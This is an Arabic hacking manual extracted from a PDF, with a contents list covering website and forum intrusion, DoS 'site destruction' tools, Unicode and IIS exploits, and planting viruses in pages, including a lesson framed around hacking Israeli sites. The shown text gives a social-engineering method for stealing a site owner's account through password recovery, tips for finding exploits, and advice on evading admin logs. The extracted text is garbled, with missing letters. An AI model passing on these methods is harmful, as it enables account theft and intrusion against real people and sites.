Professional Documents
Culture Documents
المقدمة. .1
الفهرس. .2
مقدمة عامة عن الهاكر. .3
كيفية البحث في النترنت. .4
مفاهيم خاصة بشبكات النترنت )الجزء الول(. .5
مفاهيم خاصة بشبكات النترنت )الجزء الثاني(. .6
المن عبر النترنت. .7
أمن الشبكات. .8
مصطلحات مهمة للمبتدئين في اختراق المواقع. .9
اختراق المواقع للمبتدئين. .10
الختراق ببرنامج Webcrack. .11
الختراق ببرنامج MungaBunga. .12
برنامج تدمير المواقع .WinSmurf .13
شرح برنامج Evil Pingلتدمير المواقع. .14
برنامج الدرة لتدمير المواقع. .15
تدمير المواقع بدون برامج. .16
التلنت. .17
معلومات عن .DNS .18
معلومات عن .Routing in the Internet .19
.NETBIOS .1
بروتوكول خدمة .Finger .2
Netشرح مختصر لدارة الشبكة بإستخدام المر. .3
شرح الـsecure shell. .4
شرح معنى الـ Buffer Overflows. .5
الـ CGIوعلقتها بالنترنت. .6
كيف تحمي نفسك وتخفي أفعالك؟!. .7
كيف تبقى مجهول الهوية في النت )الجزء الول(؟؟. .8
كيف تبقى مجهول الهوية في النت )الجزء الثاني(؟؟. .9
برنامج HTTP Portالذي يجعلك تتصفح النت متخفيا!ً!. .10
شرح برنامج NeoTrace. .11
كيفية القيام بجمع المعلومات عن موقع أو شبكة. .20
برنامج عمران سكان للبحث عن الثغرات. .21
الختراق عن طريق اليونيكود )الجزء الول(. .22
الختراق عن طريق اليونيكود )الجزء الثاني(. .23
معلومات عامة عن كيفية الستفادة من ثغرات اليونيكود. .24
الدليل الكامل لختراق سيرفر .IIS .25
دراسة مفصلة وبعمق في الـ UniCode. .26
تدريب على عملية الختراق بواسطة اليونيكود. .27
شرح مفصل لكيفية اختراق المواقع المجانية. .28
درس مفصل عن الكوكيز. .29
شرح برنامج السطورة God Willفي تلغيم الصفحات. .30
وداعًا للبرنامج السطورة ومرحبا ببرنامج .NOOP4 .31
معلومات مهمة عن المواقع التي تدعم الفرونت بيج. .32
اختراق المواقع التي تدعم الفرونت بيج. .33
الختراق العشوائي. .34
الطريقة الصحيحة والمثلى في اختراق المواقع. .35
نبذه يسيرة ومبسطة عن كيفية اختراق المواقع. .36
)>س&ج<( في اختراق المواقع للمبتدئين. .37
1
برنامج CgiScanerللبحث عن الثغرات. .38
شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في المواقع. .39
شرح برنامج Shadow Scan Securityلتحليل الموقع. .40
اماكن وجود ملف الباسورد في أنظمة التشغيل. .41
اختراق الموقع )الجزء الول(. .42
اختراق المواقع )الجزء الثاني(. .43
اختراق المواقع )الجزء الثالث(. .44
درس في اختراق المواقع )متوسط(. .45
شرح ملف .htaccess .46
نظام نقل الملفات FTP. .47
الختراق عن طريق FTP. .48
اختراق الـ .SQL .49
درس مفصل عن الـSQL. .50
درس لحتراف الهاك في اختراق المواقع. .51
استغلل لينكس في اختراق المواقع. .52
درس اخر في اختراق المواقع عن طريق لينكس. .53
شرح مفصل من اللف إلى الياء في احتراف اختراق المواقع عن طريق لينكس. .54
درس عن الـ ) PHP Shellالجزء الول(. .55
درس عن الـ ) PHP Shellالجزء الثاني(. .56
درس عن الـ ) PHP Shellالجزء الثالث(. .57
شرح أداة .anmap .58
طريقة لقتحام السيرفرات بدون ثغرات. .59
.Cross Site Scripting .60
كود تدمير سجل الزوار. .61
وضع فايروس في صفحة. .62
الثغرااات. .63
شرح شبه مفصل عن الثغرات. .64
كيف تستخدم الثغرات. .65
تمتع بإختراق المواقع السرائيلية مع هذه الثغرة. .66
ثغرة نيوك. .67
ثغرة .Chunked .68
حماية المنتديات. .69
اختراق المنتديات من نوع .vBulletin2,2,0 .70
درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها. .71
ثغرة في منتديات .vBulletin 2,2,9 .72
اختراق منتديات .phpbb 2.0.0 .73
ثغرة في . php nuke .74
أفضل المنتديات والمواقع العربية للهاك. .75
أفضل مواقع المن والهاك النجليزية. .76
الخاتمة. .77
2
بسم الله الرحمن الرحيم
مرجعا ً لخواني وأخواتي المسلمين ،ففي هذا الكتاب سأقوم بنقل كل ما
المسلمين.
اقرأ هذا اول ً قبل البدء بقراءة مواضيع هذا الكتاب"اقسم بالله العلي
العظيم
والله الموفق،،،
3
"من هم الهاكر "
الهكرز هم اشخاص مخترقون لجهزة الغير بمساعدة احدى برامج الختراق المشهورة إعتماًد على برامج
.مساندة تسهل عملية التصال بين الحاسبين تسمى بالباتش اوالسيرفر
هذا السؤال الذي دفع الكثيرين الي البحث والبحار في عالم النت
هناك انواع من الصفحات والسرفرات التي توفر مواقع مجانية
النوع الول
سيرفرات تحتفظ ببياناتك واذا نسيت او لم تتذكر باسوورد موقعك فانها سوف تطلب منك بياناتك الشخصية
السرية التي ل يعلمها ال انت مثل
اسمك الحقيقي الكامل
عمرك وميلدك
من اي بلد انت
وتختلف الدقة من سيرفر الي سيرفر آخر
النوع الثاني
سيرفرات تحتفظ ببياناتك واذا اضعت الباسوورد او نسيته فانها تطلب منك فقط الضغط علي ايكون مكتوب
عليه
))نسيت الباسوورد((
ومن ثم يرسلون الباسوورد الي اليميل الخاص بك
...................................................................
هذا النوع يسهل اختراقه اذا عرفت بيانات الشخص واستطعت التحدث معه بشتي الطرق وباسلوب لبق وما
ان تعرف بياناته
الشخصية حتي يمكنك ان تذهب الي صفحته الخاصه والضغط علي ايكون انك نسيت الباسوورد وادخال
البايانات الخاصة
...ومن ثم تغيير الباسوورد
وتغيير بيانات صاحب الصفحة الخاصة والسرية
..........................
النوع الثاني
هذا النوع مهما حاولت سرقة الباسوورد فانك لتستطيع ان تمتلك الصفحة لمدة طويلة لن الشركة سوف
ترسل اليه الباسوورد
..الجديد ..ومن هنا سيعرف الباسوورد ورقمه الجديد
!!! وسيتم اعادة ملكيته الي الصفحة او الموقع مره أخري
(( اذا كيف الحل ؟؟
..الحل هو
ان تعرف باسوورد اليميل الخاص به وحين تعرف الباسوورد سيمكنك الذهاب الي الشركة وكتابة انك نسيت
الباسوورد للموقع
..فسيتم اخطارك علي اليميل الذي سرقته ..بالباسوورد للموقع
.ومن هنا يمكنك سرقتة وملكيته وانت بسلم
،،،انتهى
4
"كيفية البحث في النترنت"
صنعت محركات البحث حتى تساعدك في الوصول الى ما تريد باقصر وقت ممكن ولكن عليك ان تعلم ان
محركات البحث لكل منها عمل مع العلم انها عامه ولكن
ما هي النتائج ؟؟
بالنسبه مثل للجوجل انا اعتبره المحرك الذكي فهو يعرف ماذا كتبت فلذلك يعطيك النتائج الولى وهي غالبا
التي تريدها
بالنسبه للياهو هو ايضا ذكي ولكن ذكائه تجاري بحت حيث انه يقدم لك المواقع التجاريه التي تقدم ما تريد
والتي يتعامل معها المحرك ثم المواقع التجاريه التي ل يتعامل
معها المحرك ثم المواقع العامه وهي ما ترده انت احيانا
يا اخوان انا ابغى ابحث عن برنامج ما مثل يجب علي ان اخطط للبحث قبل ان اذهب الى المنتديات واسئل
لزم انت تتعلم كيف تبحث
وش الفرق بينك وبين النسان اللي هيجيبلك المعلومه من المنتدى ؟ هل يملك ريشه على دماغه ؟؟؟ ل اعتقد
ذلك
هل النترنت لديه سريعه للغايه وانت بطئيه للغايه ؟ ايضا ل اعتقد ذلك مع العلم ان السرعات العاليه اثبتت
فشلها بالنسبه لبعض الشخاص
التي ل تعرف كيف توظف عقولها
كنت مره في حديث مع صديق لي بدوله عربيه في الخليج وكان يحدثني بصراحه ويقول لي وال يا اخ بلك
انا الن لي سنه كامله على النترنت
غير محدد بباندويث وبسرعة 256ول اعرف من برامج الختراق غير الهاك اتاك ISDNمع خط
فعل انا تحطمت سنه كامله ومعك القوه الضاربه هذه ول تعرف غير الهاك اتاك ؟ قلتلله انت اكيد وقتك ما بين
مواقع الغاني والفلم والداون لود لها والشات قال ايوال هذا هو انا
وبذلك فعل ايقنت ان السرعه ليست كل شيء
.اهم شي عقلية من يملك السرعه فالسلح الذي ل تستطيع استخدامه -ل ينفع - (:ا هـ
مواقع تجاريه
5
)) مواقع برامج )) ويندوز -ليونكس
مواقع ملتيميديا
مواقع سياسيه واخباريه
مواقع هاك
مواقع كراك
مواقع سكيوريتي
مواقع هاردوير
منتديات
)) محرك بحث جوجل )) هذا لوحده عالم
مواقع .....الخ
مثل برنامج ؟ بسيطه جدا ؟ وش يخليني اروح ابحث مثل في الياهو ؟؟؟ وش يخليني ابحث بمحرك عام ؟؟؟؟
او حتى وش يخليني اروح ابحث بالقوقل ؟؟؟
خلص بما انه برنامج انطلق فورا الى مواقع البرامج امثال زد دي نت -ويب اتاك -داون لود -وغيرها
وبالنسبه لليونكس فهناك موقع انا اعتبره انه اقوى من موقع داون لود في برامجه للويندوز
)) وهو موقع فريش ميت )) اخر الموضوع ساضع كل تلك المواقع كمرجع
بعد ان بحثت ولم اجد البرنامج ماذا افعل ؟ هل انتهى العمل ؟ ل لم ينتهي بعد اذهب الى الجوجل وابحث عن
ما تريد وابدا بقرائه النوتس الذي يخبرك ماذا تحوي هذه الصفحه
واذا وجدت ما تريد ادخل اليها
لم تجد ؟؟ )) ما اعتقد انك ما هتلقي اللي تدور عليه انا عمري ما سويت هالطريقه ال واجد ما اريد (( ولكن
لنفرض انك لم تجد ؟ ماذا ستفعل ؟ اذهب الى المنتديات وابحث
قبل ان تسأل واذالم تجد وقتها بامكانك السوال بالمنتدى
هذه نقطه نقطة اخرى مثل انت منت عارف اللي انت تبحث عنه بالظبط
مثل انا ادور على ثغره عارف نوعها ولكن ماني عارف موجوده في وش
CSSاو XSSواللي اختصارها Cross Site Scripteولتكن مثل ثغرات الـ
انا ما ادور على الثغره ادور على اكسبلويت مثل وش اسوي ؟؟؟
هيطلعللك كل شي عنها ابدا ابحث فيما تريد وفي نفس XSSاذهب اول لمواقع السكيوريتي ابحث عن كلمة
الوقت اذهب الى الجوجل مثل وابحث عن
ولكن هذا ل يكفي انا ابغى شي بعينه والجوجل مو زي مواقع السكيوريتي هتجيب شي بسيط ل XSS
) ( +الجوجل هيجيب بلوي ولذلك علي بتحديد البحث عبر علمه
:يعني انا ادور بجز وادور اكسبلويت وادور باسم الثغره فعلي ان اكتب
XSS+BUG+EXPLOIT
:هاكتب IISمثل ادور ثغرات
IIS+exploit+bug
خليه يطلعللك كل شي عن المسئله اللي تبحث عنها اهم شي انه يجيبلك مواضيع في ما تبحث عنه
عن ماذا ابحث ؟ موضوع يتعلق ببرنامج ؟ ويندوز وال ليونكس ؟ رتب المواقع :ابدا البحث
عن ماذا ابحث ؟ موضوع يتعلق بالشوبرينج ؟ رتب المواقع :ابدا البحث
6
وهكذا
)) عبر برامجها مثثل الكازا او المورفيس او اوديو جالكسي او وين ام اس: )) مواقع ملتيميدياkazaa -
WinMX الكثر شهره
انتهى،،،
7
")مفاهيم خاصة بشبكات النترنت )الجزء الول"
>ةةةةة <
النترنت عالم مليء بالفائدة ،مليء بالمتعة ،عالم يجد فيه كل إنسان ما يهمه ،باختلف مجالت الهتمام
واختلف الشخاص .ولكن على الرغم من كثرة الشياء المفيدة في النترنت إل أنه لبد من وجود ما يكدر
الصفو .هذا الكدر نسميه "الهاكرز" أو من يسمون بالمخترقين في بعض الحيان.
من هم الهاكرز ؟ وما هي أهدافهم ؟ وكيف نتقي شرهم ؟ أسئلة ل بد أنها دارت في رأس أكثر المستخدمين
في مختلف أنحاء العالم ،ول سيما أولئك المستخدمين الذين طالهم أذى الهاكرز سواء بسرقة معلومات من
أجهزتهم أو إتلف محتوياتها أو في أهون الحوال إخافتهم وإرعابهم.
الهاكر الطيب سلسلة من الحلقات نقدمها لك أخي القارئ ،كوسيلة تعليمية لكل المستخدمين على مختلف
مستوياتهم لكي يتعلموا كيف يتقون شرور هؤلء الهاكرز ولكي يعرفوا الحيل التي يستخدمها الهاكرز للحاق
الذى بهم .باختصار ستكون أخي القارئ أحد هؤلء الهاكرز ،ولكن لن تكون مثلهم في الشر..بل ستكون
الهاكر الطيب.
مقدمة:
هذه الحلقة ستكون مخصصة لتقديم بعض المهارات والمعلومات الساسية التي يجب أن يعرفها كل من يريد
اتقاء شر الهاكرز ،وهي بعض المصطلحات والمفاهيم الخاصة شبكات الحاسب اللي.
رقم IP
ما الغرض من بطاقة الحوال المدنية التي تحملها ؟ انها مجرد وسيلة لتمييزك وتعريفك .فالرقم الموجود على
بطاقتك يستحيل تكراره لي مواطن آخر في نفس البلد.
نفس المبدأ ينطبق في مجال الحاسب اللي من ناحية الشبكات ،فلتمييز الجهزة المرتبطة بشبكة واحدة يعطى
لكل جهاز رقم مميز يستحيل تكراره في أي جهاز آخر مرتبط بنفس الشبكة وهذا الرقم هو ما يسمى بعنوان
الجهاز أو .IP
في حالة الشبكات الدائمة والتي يكون الجهاز مرتبطا بالشبكة بواسطة أسلك الشبكة ،يكون هذا الرقم ثابتا
للجهاز دائما .مالم يتم نزع الجهاز من الشبكة بشكل دائم ،ولكن في حالة التصال الهاتفي فإن عنوان الجهاز
يتغير كلما اتصلت على موفر الخدمة الذي تدخل للشبكة من خلله.
لعلك الن تتساءل كيف أعرف عنوان جهازي عندما أتصل بالنترنت؟ المر سهل جدا من شريط المهام في
الوندوز انقر على Startثم runثم أدخل .winipcfgإذا كنت تستخدم وندوز باعتماد اللغة العربية اختر
"ابدأ" ثم "تشغيل" ثم اكتب .winipcfg
تقوم كل منظمة بالشراف على توزيع ارقام IPللدول الواقعة تحت مجال اشرافها .ويوجد لكل منظمة قاعدة
8
بيانات تمكنك من معرفة صاحب رقم IPمعين وتسمى هذه الخدمة بخدمة whoisحيث تقوم بإدخال رقم IP
التابع لمنظمة معينة وستحصل على معلومات عن من يمتلك هذا IPفمثل لمعرفة صاحب رقم IPمعين في
المملكة العربية السعودية قم بالذهاب للموقع http://www.ripe.net/db/whois.htmlوأدخل رقم
IPوستحصل على معلومات متكاملة عن صاحب هذا الرقم.
المنفذ Port
ماهو المنفذ ؟ تخيل منزل فيه العديد من البواب وأن كل واحد من هذه البواب مخصص لخدمة معينة ،فباب
لستقبال الضيوف وباب آخر للخدم وباب آخر لدخول الخدمات.نفس المبدأ ينطبق على الحاسب اللي فالجهاز
يحتوي على العديد من الخدمات مثل خادم الويب web serverوخادم الملفات ftp serverوغيرها.
فكل تطبيق لديه منفذ معين يستخدمه لرسال واستقبال بياناته وهذا نوع من التنظيم فمثل خدمة الويب غالبا
ما تكون على المنفذ 80وخدمة الملفات تكون على المنفذ 21وبرنامج النت ميتنغ يكون على عدة منافذ
منها 1720وكل تطبيق يكون له منفذ معين .فبالتالي عندما تأتي بيانات للجهاز على منفذ معين فسوف
يعرف الجهاز لي تطبيق تنتمي هذه البيانات ويقوم بإرسالها لهذا التطبيق الذي يقوم بمعالجتها.
DNSماهو ؟
أنت بالطبع تتذكر أسماء أصدقائك ول تواجه أي مشكلة في استرجاعها من ذاكرتك ولكن ماذا عن أرقام
9
هواتفهم ؟كم رقما تحفظ منها ؟ اثنان ؟ عشرة؟ مهما كانت ذاكرتك جيدة فلن تستطيع حفظ أرقام هواتفهم كلها
وإن فعلت فتبقى الحقيقة أن نسيان الرقام أكثر سهولة من نسيان السماء .من هذا المبدأ جاءت فكرة
.DNSحيث أنه في بداية استخدام النترنت كان من المفروض أن تحفظ عنوان الجهاز IPلكل موقع ..
فمثل لزيارة موقع CNNيجب أن تكتب 207.145.53.10بدل من www.cnn.comومن ثم لحظ
خبراء الحاسب أن ذلك سيكون صعبا جدا ..فالذاكرة البشرية غير قادرة على حفظ الكثير من الرقام ومن هنا
تم التوجه للـ DNSوهو عبارة عن جهاز خادم يحفظ معلومات هي عبارة عن أسماء الجهزة وأرقام IP
الخاصة بها حيث يقوم المستخدمون بإرسال اسم الموقع الى مزود DNSليرد عليهم بعنوانه )رقم IP
الخاص به( فلتدخل على موقع www.cnn.comيكفي ان تكتبها في المستعرض الذي سيقوم بإرسالها
لخادم السماء DNSوالذي سيقوم بتحويلها الى عنوان الجهازحتى يستطيع جهازك التخاطب مع خادم
الويب الخاص بشبكة سي ان ان ...اختصارا ،يمكن القول بأن خادم السماء DNSماهو ال جهاز يحتوي
على قاعدة بيانات فيها اسماء الجهزة في النترنت وأرقام IPالخاصة بها.
المر netstat
هل تعلم بأنه من المستحيل أن يكون هناك تخاطب بين جهازك وبين أي جهاز آخر في النترنت بدون أن
يكون لدى كل من الجهازين رقم الـ IPالخاص بالجهاز الخر؟ وأقصد بالتخاطب هو نقل أي نوع من البيانات.
هذا شيء ضروري فلكي ترسل رسالة إلى شخص معين فيجب أن تعرف عنوانه ويجب هو أيضا أن يعرف
عنوانك لكي يقوم بالرد عليك .بالطبع هناك عدة استثناءات سنتحدث عنها في وقتها .في نظام الشبكات يسمى
هذا التخاطب بالتصال .connectionطبعا لكل اتصال يجب أن يكون هناك من يقوم بطلب التصال
ويسمى عميل أو Clientويكون هناك أيضا من يتم التصال عليه ويسمى مزود .server
هناك أمر في نظام الدوس يسمح لك بمعرفة جميع الجهزة المتصلة بجهازك ) أو التي يقوم جهازك بارسال
واستقبال البيانات منها( ومعرفة المتفذ ) (portالذي تم عليه التصال) فائدة المنفذ هي تحديد التطبيق الذي
تم التصال عليه( وهذا المر هو المر netstatما عليك إل أن تقوم بتشغيل ms-dos promptمن
قائمة برامج programsومن ثم اكتب هذا المر وستحصل على قائمة بكل هذه الجهزة مع المنفذ الذي تم
عليه التصال في كل الجهازين.
10
دخلت بها )المشرف هو الشخص الذي أنشأ الغرفة أو الشخص الذي تم منحه الصلحية من قبل من أنشأ
الغرفة( ،حيث أن المشرف يحصل على رقم الـ IPالكامل لكل شخص دخل غرفته.
.2في حالة تبادلك الملفات مع شخص في نظام المحادثة :فمزود المحادثة يقوم بدور الوسيط في نقل
النصوص فقط ،أما في حالة نقل الملفات فإنه يقوم بإعطاء كل الجهازين رقم الـ IPالخاص بالجهاز الخر
بحيث يقومان بنقل البيانات بينهما بشكل مباشر.
مما ذكر أعله ،احذر من الدخول للغرف التي تكون مخصصة للهاكرز ،حيث أنه المشرف )وهو هاكر في
الغالب( سيحصل على رقم IPالخاص بك مباشرة مما يعرض جهازك لخطر الختراق .وأيضا احذر من
استقبال الملفات ممن ل تعرفهم أو ممن يعرض عليك إرسال الملفات بدون سبب ،لن غرضه الوحيد ربما
يكون الحصول على رقم الي بي الخاص بك.
11
المحادثة Chat 6667 ويب Web 80
12345,20034تروجان NetBus استقبال بريد الكتروني 110
POP3
مشاركة ملفات في 139
ويندوز
انتهى،،،
12
"مفاهيم خاصة بشبكات النترنت )الجزء الثاني("
لكي تعرف كيف تحمي نفسك من أي خطر يجب أول أن تعرف ما هو هذا الخطر ومن ثم يصبح بإمكانك أن
تعرف كيف تحمي نفسك من هذا الخطر ،فمثل لكي نحمي أنفسنا من اللصوص ،يجب أن نعرف خطرهم .ومن
ثم يجب أن نعرف كيف نتقي شرهم ،فنحن نقفل البواب لمعرفتنا أن اللصوص قد يدخلون منها في حال
تركناها مفتوحة .كذلك هو الحال بالنسبة للحاسب اللي ،فلكي تعرف كيف تحمي نفسك من شرور الهاكرز،
يجب أن تعرف كيف يقومون باختراق جهازك ،وما هي البواب التي يدخلون منها إلى أجهزتنا.
في الحلقة السابقة تكلمنا عن بعض مصطلحات ومفاهيم الشبكات ،والتي تساعدك على معرفة ما سنتحدث
عنه في هذه الحلقة وهي الطرق والبرامج التي تمكن المخترقين )الهاكرز( من القيام بعملية الختراق لجهزة
المستخدمين لشبكة النترنت ،سواء كان هذا الختراق لغرض التجسس وسرقة الملفات أو لغرض التخريب
ومسح الملفات .بالطبع فإننا سنلمح لهذه البرامج تلميحا ،ولن نذكر أسماءها وذلك حتى ل يتم إساءة
استغللها.
-1الفيروسات ):(Viruses
عندما يتم التحدث عن الخطار الموجودة في الحاسب اللي ،تتوجه أذهان المستمعين تلقائيا للتفكير في
الفيروسات ،نظرا لنتشارها وقوة تأثيرها التخريبية على أجهزة الحاسب اللي .ولعله من المناسب عدم
الطالة في الحديث عن الفيروسات ،فالغالبية )إن لم يكن الكل( يعرفون خطرها وتأثيرها على أجهزة
المستخدمين.
-2التروجان ):(Trojans
التروجان أو أحصنة طروادة هي البرامج التي يكون في ظاهرها أنها تقوم بأداء وظيفة مفيدة للمستخدم
ولكنها في الحقيقة وخلف الكواليس تقوم بعمل وظيفة أخرى )غالبا مخربة( بدون علم المستخدم .وقد
انتشرت هذه النوعية بكثرة في النترنت ،نظرا لسهولة انخداع المستخدم بها ونظرا لما تعطيه للمخترقين من
إمكانيات تصل في بعض الحيان إلى التحكم شبه الكامل في جهاز المستخدم الضحية.
لعل من أشهر التروجان المنتشرة في النترنت التروجان المسماة بـ "نت باس" NetBusو" باك اوريفيس
" Back Orificeو "سب سيفين " . SubSevenوطريقة عملها متشابهة وهي أن يقوم المخترق
بإخفاء التروجان في أحد الملفات والتي يقوم المستخدمون الخرون بسحبها ظنا منهم بأن هذه الملفات تقوم
بوظائف مفيدة لهم ،وعندما يقوم المستخدم بتنفيذ هذا الملف فإنه يقوم وبدون علمه بتركيب خادم للتروجان
داخل جهازه بحيث يتمكن المخترق )باستخدام برنامج عميل للتروجان (clientمن التحكم في جهاز
المستخدم الضحية.
تتشابه هذه التروجان في الوظائف التي تمكن المخترق من القيام بها ،وتتراوح خطورة الوظائف من
التجسس على الجهاز ) مثل سرقة الملفات والبريد اللكتروني وكلمات السر المختلفة( حتى العبث بجهاز
المستخدم بإخراج القراص المضغوطة ) (CD-ROMأو إظهار رسالة مضحكة للمستخدم أو تشغيل ملف
صوت وغيرها من الوظائف الخرى المزعجة.
13
صورة تبين واجهة برنامج نت باس ويظهر فيها الوظائف المختلفة التي يمكن للهاكر القيام بها
14
أحد البرامج التي تقوم بالبحث عن المجلدات الموضوعة المشاركة
-6 -6المواقع المشبوهة:
من فترة لخرى يتم اكتشاف الكثير من الثغرات المنية في المتصفحات ويتم استغلل هذه الثغرات بشكل كبير
من قبل أصحاب مواقع الهاكرز .هذه الثغرات قد تمكن المخترق من الحصول على بعض الملفات والمعلومات
الشخصية من جهازك .لذا يجب عليك الحذر عند زيارة المواقع التي يشتبه في كون أصحابها من المخترقين
نظرا لقدرة أصحاب المواقع على وضع بريمجات في مواقعهم لستغلل الثغرات المنية في متصفحك والدخول
15
إلى جهازك .وأبسط المثلة على ذلك ما يقوم به بعض المخربون من وضع بريمج ) (scriptيقوم بتكرار
تشغيل برنامج المتصفح وفتح نوافذ جديدة حتى تنتهي موارد النظام ويصبح ل يستجيب للمستخدم مما
يضطره لعادة تشغيل الجهاز ! بالطبع فإن هذه الثغرة تم تلفيها في متصفح إنترنت اكسبلورر 4وما فوق
ولكنها تعطي مثال بسيطا للتخريب الذي ممكن أن يقوم به المخترقون.
-7الخدمات الضافية:
يشتمل نظام التشغيل على بعض الخدمات الضافية التي قد ل يحتاجها المستخدم والتي قد تكون المدخل إلى
جهازك ،فمثل بعض الصدارات من نظام ويندوز تحتوي على خادم ويب وخادم FTPوخادم بريد إلكتروني )
(SMTPوهي ل تستخدم من قبل غالب المستخدمين ولكنها تحتوي في أغلب الحيان على ثغرات أمنية
تمكن المخترقين من العبث بجهازك .ويتم دائما إصدار تعديلت لهذه المشاكل المنية ولكن أغلب المستخدمين
ل يقومون بتركيبها .لذا فمن المستحسن أثناء تركيب نظام التشغيل أن يقوم المستخدم بإلغاء تركيب هذه
الخدمات عندما ل يكون محتاجا لها وفي حالة كان المستخدم محتاجا لها ،فمن المستحسن إيقاف تشغيلها عن
اتصاله بالنترنت حتى ل يكون المنفذ الذي تعمل عليه هذه البرامج مفتوحا مما يسد الطريق على المخترقين
الذي يريدون استغلل هذه الخدمات للدخول في جهازك.
بالطبع فإن ما ذكرناه في هذا المقال ل يشمل جميع الطرق التي يستخدمها الهاكرز ،ولكنه كاف لعطاء فكرة
عن هذه الطرق ورفع درجة الحذر لدى المستخدمين عن اتصالهم بالنترنت ،مما يسهم في التقليل من
احتمالية تعرضهم للختراق.
في العدد القادم بإذن ال سنقوم بالتحدث عن الطرق والبرامج الدفاعية التي يجب على المستخدم استخدامها
لتقاء الهاكرز و شرورهم.
انتهى،،،
16
>ةةةةة ةة ةةةةة ةةةةة<
>ةةةةةة<JawaDal :
<z3r0 >ةةةةةةة:
هناك الكثير الذي يجب ان تعرفوه قبل ان تفكروا في تعلم اختراق المواقع و السيرفرات
حسناا here we G0
الكثير من الناس يعملوا هاكينج من غير ما يعرفوا ..بيفتحوا ال dosاو .shell accountيكتبوا شويه
اوامر و بووم. it reboots .ديه مش ثغره! .لقد تم اختراقك!!!
حتى لما تستخدم امر بسيط مثل /FTP ftp://hostname:في الدوس عندك و تدوس انتر
او عندك GFI LANguard network security scannerو عملت سكان على سايت و لقيت كذا
بورت مفتوح و منهم بورت ..21بتدوس عليه و تتصل بالموقع..و نفس الشيئ عن طريق التلنت..هذا يعني
انه تم اختراقك!!
ده عشان لما بتعمل log inباوامر ftpبسيطه زي ...cd lcd dir ls :و اي حاجه تانيه
لن مجرد ماتعمل log inفي حاجه اسمها LOGS...(LOG.FILES) 1
ايه بقى ال LOGده؟؟
ال log filesديه بتسجل كل شئ عن كل شخص اتصل بالجهاز) (loged inو يحصلوا على معلومات
مثل:
و الكثير الكثير!! لذا لو الدمن اراد ان يلقي نظره عليهم ) (log.filesسوف يوقع بك)track you
... (down
ربما تقول :مفيش مشكله انا هاستخدم بروكسي! بس ادي حلجه لزم تعرفها عن البروكسيهات
جهازك<--خادم البروكسي<--الموقع--FTP--تلنت او اي شئ اخر!
لو اخترقت موقع و الدمن عاوز يعرف انت مين.لو معاه شويه فلوس هيعرف!او حتي يخترق البروكسي
سيرفر و هيجيبك ..نفس الكلم لو بتستخدم اكثر من بروكسي
جهازك<--خادم البروكسي الول<--خادم البروكسي الثاني<--الثالث...--so on--
يقدر يجيبك بس هيحتاج فلوس كثير و وقت اكثر!!لكن في النهايه يقدر..
17
Wingateهو بروكسي يسمح بمشاركه كونكشن انترنت واحد او اكثر ..فائده ال Wingateانه سيخفي
ال IPعن الكمبيوتر الذي ستتصل به!!
لكن للسف هذا كل ما اعرفه عنه 1..نحتاج بعض الشخاص الذكياء ليعلمونا كيف نستخدمه و اين نجده؟!
ماذا ايضاا....اممممممــم
اه تذكرت!! ..قبل كل شئ يجب ان تعرف كيف تظل anonymousعلى ال ..webو كيف تؤمن
جهازك؟!!......مثل ال .spywareاستخدم firewallمثل ال . zone alarmامسح ملفات
الهيستوري)كالكوكيز و النترنت هيستوري و ملفات النترنت المؤقته..و الملفات الشخصيه و اللوق( انا افعل
هذه الشياء كل يوم قبل ان ادخل عالنت!! لدي برنامج رائع اسمه windows washerيجب ان يكون
عندك ,.لقد خصلت عليه من المدرسه ..سرقته هاهاها.
و الكثير .اذهب لجوجل و اكتب how to Stay anonymous on the webاو how to
secure to secure my computer
او زور موقع امني جيد و ابحث عن شئ كهذا ..و انا متأكد انك ستجد الكثير ..
و ل تنسى ال Preety Good Privacy (PGP)dانه مجاني ..يجب ان يكون عندك لو كنت تريد
اختراق موقع و تترك ايميلك فيه!
تستطيع ان تحصل عليه من/http://www.pgpi.org :
okاظن ان هذا كل ما يمكنني كتابته لكن هناك الكثير لكن يجب ان تبحث عنه!
لكن لدي سؤال الن ..و لست الوحيد الذي يحتاج الجابه ..هذه الجابه يجب ان يعرفها الجميع قبل ان يتعلم
الهاكينج
==========================================
هذا يا اخي كل ما عرفته في اخر اسبوعين .و سألت سؤالين او اكثر عن كيفيه البقاء anonymous
عالنت و عن استخدام البروكسيز و بعض الناس جاوبوني .لكن بالنهايه ليس المهم كم سؤال سألت ..يجب
ان تجد الجابه هذا هو المهم !!!.لذا ارجو يا اخي ان تبحث في هذا المجال اول ثم بعدها تتعلم الختراق.
انتهى،،،
"أمن الشبكات"
18
>ةةةةة ةة ةةةةة ةةةةة<
>ةةةةةة:ةةةةةة<
فى هذا الموضووع سأتناول بعض طرق الحماية نقل عن كتاب .
وهذا لفتقار هذا القسم لمواضيع مثل هذه .
لذلك أرجو سماع وزاع ضميركم .
--------------------------------------------------------
-1عرض لبعض المخاطر المنية التي قد تتعرض لها الشبكة و كيفية الوقاية منها.
-2وصف لعلقة الولوج الى الشبكة بأمنها.
-3كيفية حماية الموارد بواسطة تراخيص الوصول.
-4شرح لمكونات .ACL
-5شرح لعملية تفحص التراخيص.
-1المعدات.
-3البيانات.
-3عمليات الشبكة.
-4الموارد.
تعتمد درجة أمن الشبكة على مدى حساسية البيانات المتداولة عبر الشبكة.
و يتم تنظيم المن وفقا لنوع الشبكة ،ففي شبكات الند للند كل جهاز يتحكم في أمنه الخاص ،بينما يتحكم
المزود في أمن شبكات الزبون المزود.
-4تشفير البيانات عند الحاجة أما مقاييس التشفير فتضعها وكالة المن الوطني المريكية National
.(Security Agency (NSA
-5تزويد المستخدمين بأجهزة ل تحتوي على محركات أقراص مرنة أو مضغوطة أو حتى أقراص صلبة ،و
تتصل هذه الجهزة بالمزودات باستخدام رقاقة إقلع ROM Boot Chipو عند تشغيل هذه الجهزة يقوم
المزود بتحميل برنامج القلع في ذاكرة RAMللجهاز ليبدأ بالعمل.
-6استخدام برامج لتسجيل جميع العمليات التي يتم إجراؤها على الشبكة لمراجعتها عند الضرورة.
-7إعطاء تصاريح Permissionsللمستخدمين للوصول للبيانات و المعدات كل حسب طبيعة عمله و في
هذه الحالة يجب مشاركة البيانات و المعدات للسماح للخرين باستخدامها.
-8تزويد المستخدمين بحقوق Rightsتحدد النشطة و العمليات المسموح لهم إجراءها على النظام.
19
هناك نظامان أساسيان لعطاء التصاريح و الحقوق :
-2تصاريح الوصول.
في النظام الول يتم تعيين كلمة سر لكل من الموارد المطلوب مشاركتها و يتم الوصول لهذه الموارد فقط من
قبل من لديه كلمة السر.
